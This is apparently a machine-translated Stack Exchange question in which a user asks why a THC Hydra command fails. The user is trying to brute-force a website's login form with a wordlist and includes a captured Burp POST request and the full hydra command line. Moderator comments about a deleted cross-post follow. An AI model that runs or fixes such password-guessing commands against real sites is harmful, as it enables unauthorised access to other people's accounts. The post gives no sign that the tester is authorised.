J'ai compilé THC Hydra avec CygWin et utilisé Rot (sous Windows 7). J'ai lu des tutoriels mais je n'arrive pas à faire en sorte qu'Hydra fasse son travail.
Ci-dessous sont les informations que j'ai reçues de Burp (j'ai remplacé certaines informations par des x ou des y) et au bas de la ligne de commande dont je pense que cela devrait fonctionner. Malheureusement, après avoir frappé entrer hydra revient avec quelques informations de base sur la syntaxe.
BURP OUTPUT:
POST /login.php?action=in HTTP/1.1 Host: xxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://xxxxxx.com/login.php Cookie: visidincap526178=dBiizl5bQzKldS2WdMrM/ArT6VYAAAAAQUIPAAAAAAB6g3H+O0+VIC6UaHfrwDzi; visidincap821436=nmDb/MkQTXm2VsdHkiWxuzYCN1cAAAAAQUIPAA AAAADrVUYTxunztOfbWaA78Xgm; _ga=GA1.2.242869812.1465591208 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82formsent=1&redirecturl=index.php&req_username=blop&req_password=blop&login=Login
Ceci est produit sur un échec:
Mauvais nom d'utilisateur et / ou mot de passe.
Ceci est ma ligne de commande:
hydra -l yyyyy -P cygwin64/john.txt 123.456.789.012 https-post-form "/login.php:req_username=^USER^&req_password=^PASS^&login=Login:Wrong username and/or password." -V
Le message sur la sécurité a été fermé et supprimé.
—
Rory Alsop
@RoryAlsop: Je ne comprends pas, vous m'avez référé à ce site?
—
scalle
Oui. Et j'ai supprimé la croix.
—
Rory Alsop
ach ,, je vois, vous voulez dire celui dans la pile d'échange ... afin que les gens puissent toujours répondre ici
—
scalle
Non, tout cela est Stack Exchange. J'ai supprimé celui de Security Stack Exchange
—
Rory Alsop